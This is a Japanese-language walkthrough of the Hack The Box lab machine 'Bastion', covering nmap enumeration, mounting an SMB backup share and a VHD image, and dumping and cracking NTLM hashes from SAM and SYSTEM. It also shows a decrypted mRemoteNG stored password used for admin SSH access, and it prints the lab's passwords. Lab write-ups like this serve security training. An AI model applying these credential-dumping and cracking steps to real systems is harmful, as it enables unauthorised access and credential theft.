Bastionはwindowsのマシンで、難易度はeasyです。
・使用ツール
smbclient
mount
guestmount
samdump2
john the ripper
mRemoteNG-Decrypt
目次
1.Enumeration
nmpaでオープンポートが、22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670であることを確認
nmapのデフォルトスクリプトエンジンを実行(-sC オプション)
# Nmap 7.80 scan initiated Mon Dec 21 07:22:50 2020 as: nmap -p 22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 -sV -sC -Pn -o nmap 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -16m17s, deviation: 34m38s, median: 3m41s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-12-21T13:27:32+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-21T12:27:35
|_ start_date: 2020-12-21T11:43:21
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 21 07:24:02 2020 -- 1 IP address (1 host up) scanned in 71.98 seconds2.Exploitation
smbclientコマンドで、対象の共有フォルダを確認
mountコマンドで、Backupsのフォルダをマウントする
マウントしたディレクトを確認すると、.vhdの拡張子があるファイルを確認
vhdファイルをマウントするために、libguestfs-toolsをインストールする
以下のコマンドでvhdファイルをマウントする
guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd2 -vマウンドしたファイルからNTLMハッシュをダンプします。
root@kali:/mnt/vhd2/Windows/System32/config# samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::johnを使用して、hash値を解析する
kali@kali:~/hackTheBox/Bastion$ john --show --format=nt hash
L4mpje:bureaulampje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
1 password hash cracked, 0 left解析した情報でsshログインする
password:bureaulampje
3.Privilege Escalation
ディレクトリに「mRemoteNG」があり、confCons.xmlを開くと、passwordが表示されていることを確認できる
ローカルにconfCons.xmlを転送する
パスワードは暗号化されているため、パスワード解析ツールを使用する
ツールを使用した結果パスワードが「thXLHM96BeKL0ER2」であることを確認
sshで接続すると、管理者権限でログイン
